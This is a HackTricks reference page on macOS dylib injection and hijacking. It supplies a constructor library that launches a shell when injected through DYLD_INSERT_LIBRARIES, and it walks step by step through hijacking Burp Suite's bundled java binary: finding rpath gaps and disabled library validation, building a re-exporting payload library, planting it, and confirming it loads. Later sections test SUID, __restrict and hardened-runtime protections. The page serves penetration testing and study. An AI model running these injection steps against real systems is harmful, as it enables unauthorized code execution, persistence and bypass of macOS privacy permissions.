# macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

## DYLD\_INSERT\_LIBRARIES Basic example **Library to inject** to execute a shell: ```c // gcc -dynamiclib -o inject.dylib inject.c #include #include #include __attribute__((constructor)) void myconstructor(int argc, const char **argv) { syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]); printf("[+] dylib injected in %s\n", argv[0]); execv("/bin/bash", 0); } ``` Binary to attack: ```c // gcc hello.c -o hello #include int main() { printf("Hello, World!\n"); return 0; } ``` Injection: ```bash DYLD_INSERT_LIBRARIES=inject.dylib ./hello ``` ## Dyld Hijacking Example The targeted vulenrable binary is `/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java`. {% tabs %} {% tab title="LC_RPATH" %} {% code overflow="wrap" %} ```bash # Check where are the @rpath locations otool -l "/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java" | grep LC_RPATH -A 2 cmd LC_RPATH cmdsize 32 path @loader_path/. (offset 12) -- cmd LC_RPATH cmdsize 32 path @loader_path/../lib (offset 12) ``` {% endcode %} {% endtab %} {% tab title="@rpath" %} {% code overflow="wrap" %} ```bash # Check librareis loaded using @rapth and the used versions otool -l "/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java" | grep "@rpath" -A 3 name @rpath/libjli.dylib (offset 24) time stamp 2 Thu Jan 1 01:00:02 1970 current version 1.0.0 compatibility version 1.0.0 ``` {% endcode %} {% endtab %} {% tab title="entitlements" %}

codesign -dv --entitlements :- "/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java"
[...]com.apple.security.cs.disable-library-validation[...]

{% endtab %} {% endtabs %} With the previous info we know that it's **not checking the signature of the loaded libraries** and it's **trying to load a library from**: * `/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/libjli.dylib` * `/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/libjli.dylib` However, the first one doesn't exist: ```bash pwd /Applications/Burp Suite Professional.app find ./ -name libjli.dylib ./Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib ./Contents/Resources/jre.bundle/Contents/MacOS/libjli.dylib ``` So, it's possible to hijack it! Create a library that **executes some arbitrary code and exports the same functionalities** as the legit library by reexporting it. And remember to compile it with the expected versions: {% code title="libjli.m" %} ```objectivec #import __attribute__((constructor)) void custom(int argc, const char **argv) { NSLog(@"[+] dylib hijacked in %s",argv[0]); } ``` {% endcode %} Compile it: {% code overflow="wrap" %} ```bash gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation libjli.m -Wl,-reexport_library,"/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib" -o libjli.dylib # Note the versions and the reexport ``` {% endcode %} The reexport path created in the library is relative to the loader, lets change it for an absolute path to the library to export: {% code overflow="wrap" %} ```bash #Check relative otool -l libjli.dylib| grep REEXPORT -A 2 cmd LC_REEXPORT_DYLIB cmdsize 48 name @rpath/libjli.dylib (offset 24) #Change to absolute to the location of the library install_name_tool -change @rpath/libjli.dylib "/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib" libjli.dylib # Check again otool -l libjli.dylib| grep REEXPORT -A 2 cmd LC_REEXPORT_DYLIB cmdsize 128 name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) ``` {% endcode %} Finally just copy it to the **hijacked location**: {% code overflow="wrap" %} ```bash cp libjli.dylib "/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/libjli.dylib" ``` {% endcode %} And **execute** the binary and check the **library was loaded**:

./java
2023-05-15 15:20:36.677 java[78809:21797902] [+] dylib hijacked in ./java
Usage: java [options] <mainclass> [args...]
           (to execute a class)

{% hint style="info" %} A nice writeup about how to abuse this vulnerability to abuse the camera permissions of telegram can be found in [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/) {% endhint %} ## Bigger Scale If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` execution). ```bash sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"' ``` ## Check restrictions ### SUID & SGID ```bash # Make it owned by root and suid sudo chown root hello sudo chmod +s hello # Insert the library DYLD_INSERT_LIBRARIES=inject.dylib ./hello # Remove suid sudo chmod -s hello ``` ### Section `__RESTRICT` with segment `__restrict` ```bash gcc -sectcreate __RESTRICT __restrict /dev/null hello.c -o hello-restrict DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict ``` ### Hardened runtime Create a new certificate in the Keychain and use it to sign the binary: {% code overflow="wrap" %} ```bash codesign -s --option=runtime ./hello DYLD_INSERT_LIBRARIES=inject.dylib ./hello codesign -f -s --option=library ./hello DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Will throw an error because signature of binary and library aren't signed by same cert codesign -s inject.dylib DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Throw an error because an Apple dev certificate is needed ``` {% endcode %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥